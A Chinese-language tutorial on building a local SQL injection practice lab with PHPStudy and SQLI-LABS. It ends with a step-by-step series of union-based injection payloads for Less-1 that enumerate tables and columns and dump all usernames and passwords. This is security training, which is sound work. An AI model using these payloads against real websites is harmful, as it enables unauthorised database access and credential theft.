SQL注入练习场：PHPStudy+SQLI-LABS靶场搭建教程（零基础友好版）

注意：文中涉及演示均为模拟测试，切勿用于真实环境，任何未授权测试都是违法行为！

一、环境准备

1. 下载PHPStudy
   官网下载地址：https://www.xp.cn/php-study（选择Windows版）
   

安装时建议选择自定义路径 （如 D:\phpstudy_pro），避免系统盘权限问题

2. 下载SQLI-LABS源码
   从GitHub获取源码包：https://github.com/Audi-1/sqli-labs
   
   下载完成后解压，将文件夹重命名为sqli-labs（避免中文路径）。

二、PHPStudy配置

1. 启动基础服务
   打开PHPStudy，启动Apache 和MySQL 服务（图2：服务启动界面）。
   

若MySQL启动失败，检查端口是否被占用（默认3306）。

2. 切换PHP版本
   点击左侧菜单【网站】→ 选择【管理】→【PHP版本】→更多→ 安装PHP5.5.9 （SQLI-LABS不支持PHP7+）。
   切换后需重启Apache服务（图3：PHP版本切换界面）。
   

三、部署SQLI-LABS靶场

1. 放置源码文件

   将sqlilabs文件夹复制到PHPStudy的网站根目录（默认路径：D:\phpstudy_pro\WWW）。

2. 配置数据库连接

   打开文件sqlilabs/sql-connections/db-creds.inc，修改以下参数：

   $dbuser = 'root';    // 数据库用户名（默认）
   $dbpass = 'root';    // 数据库密码（若未修改则为空）

四、初始化靶场数据库

1. 访问靶场页面
   浏览器输入http://localhost/sqli-labs/，进入SQLI-LABS首页。

点击页面中的Setup/reset Database for labs 链接

2. 验证初始化结果
   若显示Congratulations! Database is connected...，表示数据库创建成功。
   若报错mysql_connect() undefined，需检查PHP版本是否为5.x 。

五、开始注入练习

1. 选择关卡
   返回首页点击Less-1 （基础注入关卡），通过URL参数?id=1测试注入点。
   示例Payload：?id=1' and 1=2 union select 1,2,3 --+查看显示位
   
   ?id=1' and 1=2 union select 1,2,database()--+显示出数据库名
   
   ?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
   查看数据库的所有表
   
   ?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+查看users表中的字段
   
   ?id=1' and 1=2 union select 1,2,group_concat(username,0x7e,password) from security.users --+查看全部用户名和密码
   

还可以下载phpmyadmin管理数据库

2. 常见问题排查
   数据库连接失败 ：检查db-creds.inc密码是否与PHPStudy的MySQL一致。
   页面无法访问 ：确认sqlilabs文件夹是否位于WWW目录，且Apache端口未被占用。